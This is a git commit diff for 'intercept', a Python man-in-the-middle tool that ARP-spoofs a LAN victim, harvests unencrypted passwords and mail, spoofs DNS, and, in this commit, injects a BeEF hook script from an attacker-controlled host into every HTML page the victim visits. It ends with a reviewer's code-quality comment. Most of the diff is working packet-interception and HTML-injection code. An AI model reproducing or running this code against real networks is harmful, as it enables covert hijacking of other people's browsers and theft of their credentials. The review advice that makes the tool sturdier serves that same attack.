beef hooking more reliable

DanMcInerney 2013-11-03 04:55:33 -07:00
parent c383dcf4b7
commit f38236290e
2 changed files with 44 additions and 43 deletions


@ -3,7 +3,7 @@ intercept
Individually arpspoofs the target box, router and DNS server if necessary. Displays all most the interesting bits of their traffic. Cleans up after itself. Individually arpspoofs the target box, router and DNS server if necessary. Displays all most the interesting bits of their traffic. Cleans up after itself.
Prereqs: Linux, scapy, python nfqueue-bindings, aircrack-ng, python twisted Prereqs: Linux, scapy, python nfqueue-bindings, aircrack-ng, python twisted, BeEF (option)
Example usage as root: Example usage as root:
python intercept.py -u -p -d -ip 192.168.0.10 python intercept.py -u -p -d -ip 192.168.0.10
@ -37,6 +37,9 @@ python intercept.py -h
-na, performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt -na, performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
-b BEEF_HOOK_URL, copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
Cleans the following on Ctrl-C: Cleans the following on Ctrl-C:
@ -47,6 +50,7 @@ Cleans the following on Ctrl-C:
individually restore each machine's ARP table individually restore each machine's ARP table
To do: To do:
Add ability to read from pcap file Add ability to read from pcap file


@ -1,10 +1,6 @@
#!/usr/bin/python #!/usr/bin/python
''' '''
Description: MITMs another LAN client and prints all the interesting unencrypted info like passwords and messages. Asynchronous multithreaded arp spoofing packet parser. Description: MITMs another LAN client and prints all the interesting unencrypted info like passwords and messages. Asynchronous multithreaded arp spoofing packet parser.
Author: Dan McInerney
Contact: danhmcinerney gmail
Prerequisites: Linux Prerequisites: Linux
nmap (optional) nmap (optional)
nbtscan (optional) nbtscan (optional)
@ -16,6 +12,13 @@ Prerequisites: Linux
Note: This script flushes iptables before and after usage. Note: This script flushes iptables before and after usage.
''' '''
__author__ = 'Dan McInerney'
__license__ = 'GPL'
__email__ = 'danhmcinerney with gmail'
__version__ = 1.0
####################################################################
import logging import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
@ -103,7 +106,7 @@ class Parser():
catch_pkts = 0 catch_pkts = 0
full_pkt = '' full_pkt = ''
full_load = '' full_load = ''
drop_load = [] drop_body = []
start_time = 0 start_time = 0
def start(self, payload): def start(self, payload):
@ -123,14 +126,6 @@ class Parser():
sport = pkt[TCP].sport sport = pkt[TCP].sport
ack = pkt[TCP].ack ack = pkt[TCP].ack
load = pkt[Raw].load load = pkt[Raw].load
#################################################
if sport == 80:
# for x in self.drop_load:
# if load == x:
# payload.set_verdict(nfqueue.NF_DROP)
# return
self.beef(load, ack, pkt, payload)
#################################################
mail_ports = [25, 26, 110, 143] mail_ports = [25, 26, 110, 143]
if dport in mail_ports or sport in mail_ports: if dport in mail_ports or sport in mail_ports:
self.mailspy(load, dport, sport, IP_dst, IP_src, mail_ports, ack) self.mailspy(load, dport, sport, IP_dst, IP_src, mail_ports, ack)
@ -140,6 +135,8 @@ class Parser():
self.ftp(load, IP_dst, IP_src) self.ftp(load, IP_dst, IP_src)
if dport == 80 or sport == 80: if dport == 80 or sport == 80:
self.URL(load, ack, dport, sport) self.URL(load, ack, dport, sport)
if sport == 80 and args.beef:
self.beef(load, ack, pkt, payload)
if args.dnsspoof: if args.dnsspoof:
if pkt.haslayer(DNSQR): if pkt.haslayer(DNSQR):
dport = pkt[UDP].dport dport = pkt[UDP].dport
@ -149,36 +146,38 @@ class Parser():
dns_layer = pkt[DNS] dns_layer = pkt[DNS]
self.dnsspoof(dns_layer, IP_src, IP_dst, sport, dport, localIP, payload) self.dnsspoof(dns_layer, IP_src, IP_dst, sport, dport, localIP, payload)
#################################################
def beef(self, load, ack, pkt, payload): def beef(self, load, ack, pkt, payload):
current_time = time.time() heads = 0
############### Maybe test the next packet for having headers. If it does, then block it and inject? try:
if self.catch_pkts == 1 and current_time > self.start_time + 1: headers, body = load.split("\r\n\r\n", 1)
for x in self.drop_load: heads = 1
if load == x: except:
print '[-] load found in drop_load list' pass
payload.set_verdict(nfqueue.NF_DROP) if self.catch_pkts == 1:
break if heads == 1 or ack != self.oldBEEFack:
self.inject() heads = 0
self.catch_pkts = 0
self.inject()
if self.catch_pkts == 1 and self.oldBEEFack == ack and self.oldBEEFack != 0: if self.catch_pkts == 1 and self.oldBEEFack == ack and self.oldBEEFack != 0:
self.full_data = self.full_data+load self.full_data = self.full_data+load
print '[+] Added data to the BeEF queue' print '[+] Added data to the BeEF packet'
payload.set_verdict(nfqueue.NF_DROP) payload.set_verdict(nfqueue.NF_DROP)
return return
if 'Content-Type: text/html' in load and self.catch_pkts == 0: if 'Content-Type: text/html' in load and self.catch_pkts == 0:
self.start_time = time.time()
print '[+] HTML packet found, starting BeEF queue' print '[+] HTML packet found, starting BeEF queue'
self.drop_load.append(load)
self.oldBEEFack = ack self.oldBEEFack = ack
self.full_pkt = pkt self.full_pkt = pkt
self.full_data = load self.full_data = load
self.server = pkt[IP].src self.server = pkt[IP].src
self.catch_pkts = 1 self.catch_pkts = 1
payload.set_verdict(nfqueue.NF_DROP) payload.set_verdict(nfqueue.NF_DROP)
return
def inject(self): def inject(self):
url = '<script src='+args.beef+'></script> '
html = '<script src='+args.beef+'></script> '
body_found = 0
if self.full_pkt != '' and self.full_data != '': if self.full_pkt != '' and self.full_data != '':
try: try:
@ -197,27 +196,30 @@ class Parser():
print '[-] Could not decompress body of packet' print '[-] Could not decompress body of packet'
self.full_data = '' self.full_data = ''
self.full_pkt = '' self.full_pkt = ''
self.catch_pkts = 0
self.oldBEEFack = 0 self.oldBEEFack = 0
return return
if '<html' in body: if '<html' in body or '/html>' in body:
psplit = str(body).split('<head>')
try: try:
body = psplit[0]+'<head> '+url+psplit[1] psplit = str(body).split('</head>')
body = psplit[0]+html+'</head>'+psplit[1]
except: except:
print '[-] <head> not found in load' print '[-] </head> not found in load'
try: try:
psplit = str(body).split('</head>') psplit = str(body).split('<head>')
body = psplit[0]+url+'</head>'+psplit[1] body = psplit[0]+'<head>'+html+psplit[1]
except: except:
print '[-] </head> not found in load' print '[-] Failed to inject html'
self.full_data = '' self.full_data = ''
self.full_pkt = '' self.full_pkt = ''
self.catch_pkts = 0
self.oldBEEFack = 0 self.oldBEEFack = 0
return return
# For debugging
# fp = open(str(self.oldBEEFack)+'.html', 'wb')
# fp.write(headers+"\r\n\r\n"+body)
# fp.close
# Recompress data if necessary # Recompress data if necessary
if 'Content-Encoding: gzip' in headers: if 'Content-Encoding: gzip' in headers:
try: try:
@ -229,7 +231,6 @@ class Parser():
except: except:
self.full_data = '' self.full_data = ''
self.full_pkt = '' self.full_pkt = ''
self.catch_pkts = 0
self.oldBEEFack = 0 self.oldBEEFack = 0
print '[-] Could not recompress html' print '[-] Could not recompress html'
@ -239,7 +240,6 @@ class Parser():
print '[-] Could not split headers at Content-Length\n' print '[-] Could not split headers at Content-Length\n'
self.full_data = '' self.full_data = ''
self.full_pkt = '' self.full_pkt = ''
self.catch_pkts = 0
self.oldBEEFack = 0 self.oldBEEFack = 0
return return
httpnewlength = str(len(headers+"\r\n\r\n"+body)) httpnewlength = str(len(headers+"\r\n\r\n"+body))
@ -250,14 +250,11 @@ class Parser():
del self.full_pkt[IP].chksum del self.full_pkt[IP].chksum
del self.full_pkt[TCP].chksum del self.full_pkt[TCP].chksum
catch_pkts = 0
send(self.full_pkt) send(self.full_pkt)
print '[!] Sent injected packet' print '[!] Sent injected packet'
self.full_data = '' self.full_data = ''
self.full_pkt = '' self.full_pkt = ''
self.catch_pkts = 0
self.oldBEEFack = 0 self.oldBEEFack = 0
#################################################
# Spoof DNS for a specific domain to point to your machine # Spoof DNS for a specific domain to point to your machine
def dnsspoof(self, dns_layer, IP_src, IP_dst, sport, dport, localIP, payload): def dnsspoof(self, dns_layer, IP_src, IP_dst, sport, dport, localIP, payload):
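Review bot: The bare `except: pass` wrapped around `headers, body = load.split("\r\n\r\n", 1)` in the new `beef` body swallows every exception rather than the `ValueError` a missing header separator raises, and on Python 2 a bare `except:` also catches `KeyboardInterrupt`, so a Ctrl-C landing inside the callback could bypass the ARP-table restoration the README promises. Since only the `heads` flag is read afterwards and `headers`/`body` are never used there, the whole try block can become `heads = 1 if "\r\n\r\n" in load else 0`. The same bare `except:` appears twice in the `inject` hunk below around the `'</head>'` split and the `'<head>'` fallback, where `except IndexError:` is the failure the code actually handles (a one-element `psplit`); narrowing both keeps genuine errors visible in the output instead of being reported as a missing tag. The commented-out debugging block beginning `# fp = open(str(self.oldBEEFack)+'.html', 'wb')` should be removed rather than shipped; `inject` continues past the end of its hunk.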